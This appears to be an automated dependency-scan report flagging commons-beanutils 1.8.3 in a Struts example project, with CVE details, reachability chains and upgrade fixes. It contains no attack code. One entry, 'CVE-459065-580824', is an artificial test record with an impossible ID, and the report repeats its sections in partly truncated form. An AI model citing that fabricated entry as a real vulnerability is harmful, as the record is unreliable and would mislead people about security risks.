Vulnerable Library - struts2-tiles-plugin-6.3.0.2.jar
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
CVE-459065-580824
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
- struts2-tiles-plugin-6.3.0.2.jar (Root Library)
- commons-digester-2.1.jar
- ❌ commons-beanutils-1.8.3.jar (Vulnerable Library)
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
org.apache.struts.examples.mailreader2.dao.impl.memory.MemoryUserDatabase (Application)
-> org.apache.commons.digester3.Digester (Extension)
-> org.apache.commons.digester3.CallMethodRule (Extension)
-> org.apache.commons.beanutils.ConvertUtils (Extension)
-> ❌ org.apache.commons.beanutils.locale.converters.SqlTimeLocaleConverter (Vulnerable Component)
Vulnerability Details
Created automatically by the test suite
Publish Date: 2010-06-07
URL: CVE-459065-580824
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.
CVE-2019-10086
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
- struts2-tiles-plugin-6.3.0.2.jar (Root Library)
- commons-digester-2.1.jar
- ❌ commons-beanutils-1.8.3.jar (Vulnerable Library)
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
org.apache.struts.examples.mailreader2.dao.impl.memory.MemoryUserDatabase (Application)
-> org.apache.commons.digester3.Digester (Extension)
-> org.apache.commons.digester3.SetPropertyRule (Extension)
-> org.apache.commons.beanutils.PropertyUtils (Extension)
-> ❌ org.apache.commons.beanutils.PropertyUtilsBean (Vulnerable Component)
Vulnerability Details
In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.
Publish Date: 2019-08-20
URL: CVE-2019-10086
CVSS 4 Score Details (6.9)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
For more information on CVSS4 Scores, click here.
Suggested Fix
Type: Upgrade version
Release Date: 2019-08-20
Fix Resolution: commons-beanutils:commons-beanutils:1.9.4
CVE-2014-0114
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
- struts2-tiles-plugin-6.3.0.2.jar (Root Library)
- commons-digester-2.1.jar
- ❌ commons-beanutils-1.8.3.jar (Vulnerable Library)
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
org.apache.struts.examples.mailreader2.dao.impl.memory.MemoryUserDatabase (Application)
-> org.apache.commons.digester3.Digester (Extension)
-> org.apache.commons.digester3.SetPropertyRule (Extension)
-> org.apache.commons.beanutils.PropertyUtils (Extension)
-> ❌ org.apache.commons.beanutils.PropertyUtilsBean (Vulnerable Component)
Vulnerability Details
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.
Publish Date: 2014-04-30
URL: CVE-2014-0114
CVSS 4 Score Details (6.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
For more information on CVSS4 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114
Release Date: 2014-04-30
Fix Resolution: commons-beanutils:commons-beanutils:1.9.4;org.apache.struts:struts2-core:2.0.5
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
Vulnerability Details
Created automatically by the test suite
Publish Date: 2010-06-07
URL: CVE-459065-580824
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
Vulnerability Details
In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.
Publish Date: 2019-08-20
URL: CVE-2019-10086
CVSS 4 Score Details (6.9)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
For more information on CVSS4 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2019-08-20
Fix Resolution: commons-beanutils:commons-beanutils:1.9.4
Vulnerable Library - commons-beanutils-1.8.3.jar
BeanUtils provides an easy-to-use but flexible wrapper around reflection and introspection.
Library home page: http://commons.apache.org/beanutils/
Path to dependency file: /unknown-handler/pom.xml
Path to vulnerable library: /home/wss-scanner/.m2/repository/commons-beanutils/commons-beanutils/1.8.3/commons-beanutils-1.8.3.jar
Dependency Hierarchy:
Found in base branch: master
Reachability Analysis
This vulnerability is potentially reachable
Vulnerability Details
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.
Publish Date: 2014-04-30
URL: CVE-2014-0114
CVSS 4 Score Details (6.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: N/A
- Impact Metrics:
- Confidentiality Impact: N/A
- Integrity Impact: N/A
- Availability Impact: N/A
For more information on CVSS4 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114
Release Date: 2014-04-30
Fix Resolution: commons-beanutils:commons-beanutils:1.9.4;org.apache.struts:struts2-core:2.0.5